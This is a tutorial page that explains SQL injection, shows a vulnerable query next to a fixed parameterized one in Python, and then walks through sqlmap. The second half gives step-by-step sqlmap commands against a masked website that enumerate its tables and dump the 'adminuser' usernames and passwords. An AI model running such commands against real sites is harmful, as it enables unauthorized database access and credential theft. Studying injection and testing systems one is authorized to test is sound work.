What is an SQL injection attack?
SQL injection attacks are one of the common means hackers use to attack databases. With the growth of B/S (browser/server) application development, more and more programmers write applications in this model. However, because programmers vary in skill and experience, a considerable number of them do not check the legality of user input when writing code, which leaves the application with security risks. A user can submit a piece of database query code and, based on the results the program returns, obtain the data they want to know. This is the so-called SQL injection.
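The missing input check described above, shown next to the corrected form. This is an added example, not code from the original page; it assumes a SQLite news table with constructed rows, and the function names are hypothetical, modelled on the shownews.asp?id=67 URL used later on.

```python
import re
import sqlite3

def make_db():
    """Constructed sample data for the example."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT);
        INSERT INTO news VALUES (66, 'Unpublished draft'), (67, 'Launch'), (68, 'Update');
    """)
    return db

def show_news_vulnerable(db, raw_id):
    # The flaw: the request parameter is concatenated into the SQL text,
    # so the database parses whatever the client sent as part of the query.
    return db.execute("SELECT title FROM news WHERE id = " + raw_id).fetchall()

def parse_news_id(raw_id):
    # Legality check: accept only a short run of ASCII digits, reject the rest.
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        raise ValueError("id must be a positive integer")
    return int(raw_id)

def show_news_bound(db, value):
    # Bound parameter: the value travels separately from the SQL text and is
    # only ever compared as data, never parsed as SQL.
    return db.execute("SELECT title FROM news WHERE id = ?", (value,)).fetchall()

def show_news_hardened(db, raw_id):
    # Both layers: validate first, then bind.
    return show_news_bound(db, parse_news_id(raw_id))

if __name__ == "__main__":
    db = make_db()
    tampered = "67 OR 1=1"  # constructed input: query syntax where a number belongs
    print(show_news_vulnerable(db, "67"))      # the single requested row
    print(show_news_vulnerable(db, tampered))  # every row: the WHERE clause was rewritten
    print(show_news_bound(db, tampered))       # no rows: compared as a literal string
    try:
        show_news_hardened(db, tampered)
    except ValueError as exc:
        print("rejected:", exc)
```

Binding alone already stops the parameter from being parsed as SQL; the digit check additionally rejects malformed requests before they reach the database.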
What is sqlmap?
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection vulnerabilities and taking over database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester, and a broad range of switches, from database fingerprinting and fetching data from the database to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
Project website: http://sqlmap.sourceforge.net/
Supported databases: MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, SQLite, Firebird, Sybase and SAP MaxDB
As you can see, it covers almost all the databases on the market.
Download: http://downloads.sourceforge.net/sqlmap/sqlmap-0.9.tar.gz (the latest version is 0.9)
Install
sqlmap is written in Python, so you only need to decompress the package.
tar zxvf sqlmap-0.9.tar.gz
cd sqlmap-0.9/
Run
python sqlmap.py
Or
chmod +x sqlmap.py
./sqlmap.py
Help
python sqlmap.py -h
There are many options.
Readers who cannot see them can go here first.
There are very few worked examples on the Internet beyond the help output and explanations of it. I hope everyone will join the discussion so we can study it together.
For Access databases, in general you can only dump tables and data (to avoid unnecessary trouble, URLs are replaced by www.xxx.com, you know).
./sqlmap.py -u "http://www.xxx.com.cn/shownews.asp?id=67" --tables
Here -u "the URL you want to inject" --tables lists the tables.
Partway through, it will ask you to enter the number of threads. You can enter a number such as 5.
It will then start enumerating the tables.
Once the tables have been listed, sharp readers will know which table holds what we want.
Next, list the column names of a specified table; here it is adminuser.
./sqlmap.py -u "http://www.xxx.com.cn/shownews.asp?id=67" --columns -T adminuser
You can press Ctrl+C to stop, or wait for it to finish.
Dump the data
./sqlmap.py -u "http://www.xxx.com.cn/shownews.asp?id=67" --dump -T adminuser -C username,password
The result will be displayed soon.